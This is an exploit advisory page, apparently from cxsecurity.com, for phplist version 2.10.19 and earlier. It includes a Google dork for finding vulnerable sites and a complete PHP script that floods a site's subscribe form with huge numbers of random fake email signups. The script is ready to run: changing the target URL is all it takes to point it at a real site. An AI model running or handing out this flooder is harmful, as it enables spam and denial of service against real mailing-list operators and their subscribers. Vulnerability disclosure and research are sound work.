phplist version <= 2.10.19 / Arbitrary Suscribe Multiple E-mail

2013.04.27
Credit: Daniel Godoy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: allinurl: \"/lists/?p=subscribe\"

# Exploit Title: phplist version <= 2.10.19 / Arbitrary Suscribe Multiple E-mail # Date: 26/04/2013 # Author: Daniel Godoy # Author Mail:DanielGodoy[at]GobiernoFederal[dot]com # Author Web: www.delincuentedigital.com.ar # Software web: http://www.phplist.com/ # Tested on: Linux # Dork: allinurl: "/lists/?p=subscribe" <?php //Configure el NullBot/////////////////// $flood = "1000000000000000000000000"; $sitio="http://localhost/lists/?p=subscribe"; $list = "anuncios" // example /////////////////////////////////////// for($x=0;$x<$flood;$x++) { $mail = 'pwn'.rand().'@pwnme.com'; $ch = curl_init($sitio); curl_setopt ($ch, CURLOPT_POST, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, "email=".$mail."&emailconfirm=".$mail."&htmlemail=1&list%5B3%5D=signup&listname%5B3%5D=".$list."&VerificationCodeX=&subscribe=Suscribite+alguna+de+las+siguientes+listas.+"); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_exec ($ch); curl_close ($ch); ob_flush(); echo "Flooded whit: ".$mail."<br>"; flush(); } ?>

References:

http://www.phplist.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top